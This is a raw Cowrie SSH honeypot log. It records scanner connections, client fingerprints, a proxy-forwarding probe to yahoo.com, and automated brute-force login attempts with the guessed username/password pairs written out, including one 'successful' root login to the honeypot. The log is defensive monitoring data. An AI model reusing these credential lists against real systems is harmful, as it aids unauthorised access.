{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T09:42:52.456767Z","src_ip":"213.209.150.239","session":"424252c450c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":7077,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:7077","sensor":"my-vps","timestamp":"2025-08-26T09:42:52.593722Z","session":"424252c450c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T09:42:52.640935Z","src_ip":"213.209.150.239","session":"424252c450c7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:42:52.689583Z","src_ip":"213.209.150.239","session":"424252c450c7"}
{"eventid":"cowrie.session.connect","src_ip":"60.188.249.64","src_port":51002,"dst_ip":"1.2.3.4","dst_port":22,"session":"44d713de9205","protocol":"ssh","message":"New connection: 60.188.249.64:51002 (1.2.3.4:22) [session: 44d713de9205]","sensor":"my-vps","timestamp":"2025-08-26T09:43:16.129883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:43:16.130542Z","src_ip":"60.188.249.64","session":"44d713de9205"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T09:43:16.956266Z","src_ip":"60.188.249.64","session":"44d713de9205"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:43:24.130455Z","src_ip":"60.188.249.64","session":"44d713de9205"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":40876,"dst_ip":"1.2.3.4","dst_port":22,"session":"68462d9bff19","protocol":"ssh","message":"New connection: 196.251.86.249:40876 (1.2.3.4:22) [session: 68462d9bff19]","sensor":"my-vps","timestamp":"2025-08-26T09:43:46.030163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:43:46.102201Z","src_ip":"196.251.86.249","session":"68462d9bff19"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:43:46.103005Z","src_ip":"196.251.86.249","session":"68462d9bff19"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"P@ssw0rd","message":"login attempt [postgres/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T09:43:46.752825Z","src_ip":"196.251.86.249","session":"68462d9bff19"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:43:48.282653Z","src_ip":"196.251.86.249","session":"68462d9bff19"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":6560,"dst_ip":"1.2.3.4","dst_port":22,"session":"86f6be884904","protocol":"ssh","message":"New connection: 80.94.95.112:6560 (1.2.3.4:22) [session: 86f6be884904]","sensor":"my-vps","timestamp":"2025-08-26T09:43:58.821156Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T09:43:58.822197Z","src_ip":"80.94.95.112","session":"86f6be884904"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T09:43:58.852316Z","src_ip":"80.94.95.112","session":"86f6be884904"}
{"eventid":"cowrie.login.failed","username":"admin","password":"sienna","message":"login attempt [admin/sienna] failed","sensor":"my-vps","timestamp":"2025-08-26T09:43:59.059218Z","src_ip":"80.94.95.112","session":"86f6be884904"}
{"eventid":"cowrie.login.failed","username":"admin","password":"shoot","message":"login attempt [admin/shoot] failed","sensor":"my-vps","timestamp":"2025-08-26T09:44:00.093706Z","src_ip":"80.94.95.112","session":"86f6be884904"}
{"eventid":"cowrie.login.failed","username":"admin","password":"shitfuck","message":"login attempt [admin/shitfuck] failed","sensor":"my-vps","timestamp":"2025-08-26T09:44:01.127119Z","src_ip":"80.94.95.112","session":"86f6be884904"}
{"eventid":"cowrie.login.failed","username":"admin","password":"shaun","message":"login attempt [admin/shaun] failed","sensor":"my-vps","timestamp":"2025-08-26T09:44:02.160225Z","src_ip":"80.94.95.112","session":"86f6be884904"}
{"eventid":"cowrie.login.failed","username":"admin","password":"scotts","message":"login attempt [admin/scotts] failed","sensor":"my-vps","timestamp":"2025-08-26T09:44:03.192388Z","src_ip":"80.94.95.112","session":"86f6be884904"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:44:04.225319Z","src_ip":"80.94.95.112","session":"86f6be884904"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":42546,"dst_ip":"1.2.3.4","dst_port":22,"session":"e96f053fef8b","protocol":"ssh","message":"New connection: 196.251.86.249:42546 (1.2.3.4:22) [session: e96f053fef8b]","sensor":"my-vps","timestamp":"2025-08-26T09:44:46.647796Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:44:47.250132Z","src_ip":"196.251.86.249","session":"e96f053fef8b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:44:47.303313Z","src_ip":"196.251.86.249","session":"e96f053fef8b"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"qwe123","message":"login attempt [postgres/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-26T09:44:49.138746Z","src_ip":"196.251.86.249","session":"e96f053fef8b"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:44:50.881723Z","src_ip":"196.251.86.249","session":"e96f053fef8b"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":43954,"dst_ip":"1.2.3.4","dst_port":22,"session":"f87c757996b0","protocol":"ssh","message":"New connection: 196.251.86.249:43954 (1.2.3.4:22) [session: f87c757996b0]","sensor":"my-vps","timestamp":"2025-08-26T09:45:47.500678Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:45:48.184840Z","src_ip":"196.251.86.249","session":"f87c757996b0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:45:48.185587Z","src_ip":"196.251.86.249","session":"f87c757996b0"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"qwer1234","message":"login attempt [postgres/qwer1234] failed","sensor":"my-vps","timestamp":"2025-08-26T09:45:50.710506Z","src_ip":"196.251.86.249","session":"f87c757996b0"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:45:52.439981Z","src_ip":"196.251.86.249","session":"f87c757996b0"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":45496,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cdccb02b736","protocol":"ssh","message":"New connection: 196.251.86.249:45496 (1.2.3.4:22) [session: 4cdccb02b736]","sensor":"my-vps","timestamp":"2025-08-26T09:46:49.210399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:46:49.900412Z","src_ip":"196.251.86.249","session":"4cdccb02b736"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:46:49.901316Z","src_ip":"196.251.86.249","session":"4cdccb02b736"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"password123","message":"login attempt [postgres/password123] failed","sensor":"my-vps","timestamp":"2025-08-26T09:46:51.963379Z","src_ip":"196.251.86.249","session":"4cdccb02b736"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:46:53.513174Z","src_ip":"196.251.86.249","session":"4cdccb02b736"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60726,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc86310453a5","protocol":"ssh","message":"New connection: 217.72.205.35:60726 (1.2.3.4:22) [session: dc86310453a5]","sensor":"my-vps","timestamp":"2025-08-26T09:47:44.797381Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:47:44.803370Z","src_ip":"217.72.205.35","session":"dc86310453a5"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":46908,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d1fd6177cb2","protocol":"ssh","message":"New connection: 196.251.86.249:46908 (1.2.3.4:22) [session: 4d1fd6177cb2]","sensor":"my-vps","timestamp":"2025-08-26T09:47:51.119179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:47:51.779973Z","src_ip":"196.251.86.249","session":"4d1fd6177cb2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:47:51.781446Z","src_ip":"196.251.86.249","session":"4d1fd6177cb2"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"qwerty123456","message":"login attempt [postgres/qwerty123456] failed","sensor":"my-vps","timestamp":"2025-08-26T09:47:53.613204Z","src_ip":"196.251.86.249","session":"4d1fd6177cb2"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:47:55.343940Z","src_ip":"196.251.86.249","session":"4d1fd6177cb2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33136,"dst_ip":"1.2.3.4","dst_port":22,"session":"15a6bbfc17d3","protocol":"ssh","message":"New connection: 212.227.235.229:33136 (1.2.3.4:22) [session: 15a6bbfc17d3]","sensor":"my-vps","timestamp":"2025-08-26T09:48:33.764717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:48:34.434944Z","src_ip":"212.227.235.229","session":"15a6bbfc17d3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T09:48:34.435615Z","src_ip":"212.227.235.229","session":"15a6bbfc17d3"}
{"eventid":"cowrie.login.success","username":"root","password":"Madan@123","message":"login attempt [root/Madan@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:48:37.535654Z","src_ip":"212.227.235.229","session":"15a6bbfc17d3"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:48:38.115305Z","src_ip":"212.227.235.229","session":"15a6bbfc17d3"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":47978,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ae2ce6c4024","protocol":"ssh","message":"New connection: 196.251.86.249:47978 (1.2.3.4:22) [session: 9ae2ce6c4024]","sensor":"my-vps","timestamp":"2025-08-26T09:48:51.711876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:48:52.343984Z","src_ip":"196.251.86.249","session":"9ae2ce6c4024"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:48:52.344815Z","src_ip":"196.251.86.249","session":"9ae2ce6c4024"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"1234qwer","message":"login attempt [postgres/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-26T09:48:54.595109Z","src_ip":"196.251.86.249","session":"9ae2ce6c4024"}
